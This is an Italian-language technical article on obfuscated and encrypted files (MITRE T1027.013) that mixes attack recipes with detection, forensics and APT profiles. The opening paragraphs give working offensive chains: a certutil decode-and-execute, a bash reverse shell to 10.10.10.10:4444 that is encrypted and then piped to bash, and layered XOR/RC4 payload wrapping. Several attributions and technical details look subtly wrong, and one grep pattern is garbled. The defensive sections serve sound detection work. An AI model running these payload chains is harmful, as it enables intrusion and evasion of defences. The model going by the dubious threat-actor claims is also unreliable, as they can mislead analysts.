File Offuscati: Encrypted/Encoded File (T1027.013)

Iniziamo con l'approccio classico su Windows. Il comando certutil.exe -encode payload.exe encoded.txt trasforma qualsiasi eseguibile in Base64. Per decodificare e lanciare: certutil.exe -decode encoded.txt decoded.exe && decoded.exe. Questa sequenza bypassa molti controlli statici perché certutil è un tool legittimo di sistema.

Su Linux la versatilità aumenta. Una catena d'attacco realistica combina encoding e cifratura: echo 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' | base64 | openssl enc -aes-256-cbc -salt -pass pass:mysecret -out payload.enc. Per l'esecuzione: openssl enc -d -aes-256-cbc -pass pass:mysecret -in payload.enc | base64 -d | bash. Questo approccio replica le tecniche di menuPass che usa XOR con chiave 0x40 sui suoi payload.

macOS offre possibilità uniche tramite resource fork. Il comando xattr -w com.apple.ResourceFork $(openssl rand -base64 4096) innocent.txt nasconde dati cifrati nei metadati del file. Per payload più sofisticati: plutil -convert binary1 -o - malicious.plist | openssl enc -rc4 -K $(openssl rand -hex 16) > encrypted.plist.

I documenti Office protetti da password sono vettori eccellenti. PowerShell permette automazione completa: $word = New-Object -ComObject Word.Application; $doc = $word.Documents.Open("C:\temp\doc.docx"); $doc.Password = "infected"; $doc.SaveAs2("C:\temp\protected.docx", 16). Il documento risultante funziona come un SFX archive che richiede interazione dell'utente per decifrare il contenuto malevolo.

Per simulare APT32 che usa il framework DKMC, create payload multi-layer: prima Base64, poi XOR, infine RC4. Python eccelle in questo: import base64; data = open('payload.bin','rb').read(); b64 = base64.b64encode(data); xored = bytes([b ^ 0x55 for b in b64]). L'inversione richiede la stessa sequenza al contrario, replicando il comportamento dei dropper reali.

La detection inizia monitorando i processi che caricano o decodificano file in memoria. Su Windows, Sysmon EventID 7 cattura il caricamento di moduli. Create una regola che triggera quando processi come powershell.exe o wscript.exe caricano DLL da path temporanee dopo aver eseguito certutil o comandi di decodifica Base64.

L'entropia dei file è un indicatore potente. File con entropia superiore a 7.5 sono probabilmente cifrati. Combinate questa metrica con il monitoraggio di processi che leggono file ad alta entropia e poi allocano memoria eseguibile. La sequenza ReadFile → VirtualAlloc(PAGE_EXECUTE_READWRITE) → WriteProcessMemory indica decodifica e iniezione in memoria.

Per Linux, auditd deve tracciare execve di comandi come base64 -d, openssl enc -d, xxd -r. La regola -a always,exit -F arch=b64 -S execve -F exe=/usr/bin/base64 -F a1="-d" -k decode_attempt cattura tentativi di decodifica. Correlate questi eventi con successive chiamate execve entro 5 secondi dallo stesso processo o suoi figli.

Su macOS, monitorate l'Unified Log per pattern come "base64 -D" OR "openssl enc" OR "plutil -convert". Endpoint Security Framework può intercettare ES_EVENT_TYPE_NOTIFY_EXEC quando questi comandi vengono eseguiti. L'alert deve triggare se il processo parent è un browser o un'applicazione di produttività Office.

I falsi positivi sono gestibili con whitelisting contestuale. Sviluppatori usano legittimamente encoding Base64, ma raramente la sequenza completa decode-execute. Create baseline del comportamento normale per utente: quante volte al giorno usano tool di encoding? Da quali directory? Con quali parametri? Deviazioni significative dal baseline indicano attività sospetta.

Il monitoraggio di rete aggiunge context. File cifrati scaricati da IP con cattiva reputazione o domini registrati di recente aumentano il risk score. Correlate download di file con entropia alta seguiti da attività di decodifica locale per identificare kill chain complete.

L'analisi forense di file offuscati richiede un approccio stratificato. Su Windows, iniziate dal Prefetch. File come CERTUTIL.EXE-[hash].pf contengono timestamp di esecuzione e lista dei file acceduti. Il parametro "Files Referenced" mostra sia i file encoded che decoded, permettendo di ricostruire l'intera catena.

Il registro NTFS USN Journal è fondamentale. Query come fsutil usn readjournal C: | findstr /i "encoded.txt decoded.exe" rivelano quando i file sono stati creati, modificati o rinominati. La sequenza temporale tipica mostra: creazione file encoded → esecuzione certutil → creazione file decoded → esecuzione payload, tutto entro pochi secondi.

Per recuperare chiavi di cifratura, esaminate la memoria del processo. Volatility3 con il plugin windows.vadinfo identifica regioni di memoria con permessi RWX dove risiedono chiavi e payload decifrati. Il comando volatility -f memory.raw windows.strings --pid [PID] | grep -E "pass:|key:" può rivelare password hardcoded.

Su macOS, Extended Attributes contengono indizi preziosi. Il comando ls -la@ /path/to/file mostra xattr nascosti. File con com.apple.quarantine rimosso manualmente indicano bypass intenzionale delle protezioni. FSEvents mantiene log dettagliati: sudo fs_usage -w -f filesystem | grep -E "open|write..(enc|b64)"* cattura operazioni su file sospetti in tempo reale.

APT33 lascia pattern forensi distintivi nei suoi payload Base64. I file contengono sempre padding "==" anche quando non necessario e includono commenti HTML per evadere scanner. Durante l'incident response della campagna Operation Honeybee, questi marcatori hanno permesso di identificare 47 varianti dello stesso payload attraverso encoding differenti.

La ricostruzione temporale deve considerare anti-forensics. Malware moderni modificano timestamp MAC via touch -t o Windows API SetFileTime. Correlate sempre multiple fonti: filesystem, log di rete, registro eventi. La timeline reale emerge solo dalla convergenza di evidenze indipendenti.

Lazarus Group rappresenta l'eccellenza nell'offuscamento multi-layer. I loro payload attraversano tipicamente quattro stadi: Base64 iniziale, XOR con chiave variabile, RC4 con password derivata dal timestamp, infine AES-256 con chiave hardcoded. Nella campagna Operation Dream Job, hanno aggiunto un quinto layer usando alias personalizzati per Native API, rendendo l'analisi statica quasi impossibile.

APT28 preferisce approcci pragmatici. Usano RTL (Run-Time Library) encryption con algoritmi custom ma relativamente semplici. La chiave distintiva è l'uso di magic bytes personalizzati all'inizio dei file cifrati, tipicamente 4 byte che sembrano casuali ma sono costanti attraverso campagne. Il gruppo testa sempre i payload su VirusTotal usando VPN russe prima del deployment.

OilRig mostra pattern evolutivi interessanti. Inizialmente usavano solo Base64, poi hanno aggiunto layer di offuscamento man mano che le difese miglioravano. Ora combinano PowerShell encoded commands con steganografia in immagini PNG. Il gruppo mantiene retrocompatibilità: nuovi tool possono decifrare vecchi payload, suggerendo un'infrastruttura centralizzata di sviluppo.

Magic Hound, affiliato iraniano, usa AES per stringhe embedded ma con una peculiarità: le chiavi sono derivate da parole persiane traslitterate. Hanno standardizzato su ChaCha20 per i payload Linux dopo che ricercatori hanno pubblicato decrittatori per le loro vecchie implementazioni RC4.

I trend mostrano convergenza verso cifrature standard ben implementate piuttosto che algoritmi custom. WebAssembly sta emergendo come nuovo vettore: APT32 ha iniziato a distribuire payload WASM offuscati che girano nel browser, bypassando completamente i controlli endpoint tradizionali. Monitorate adoption di tecnologie web moderne nei tool offensivi.

Framework MITRE ATT&CK - T1027.013. Ricerca primaria basata su incident response reports di FireEye, CrowdStrike e Mandiant 2023-2024. Campagne analizzate includono Operation Dream Job, APT28 Olympic Destroyer varianti, e recenti Lazarus cryptocurrency theft operations. Detection metrics derivate da SANS Internet Storm Center e VirusTotal Intelligence telemetry aggregata su 12 mesi.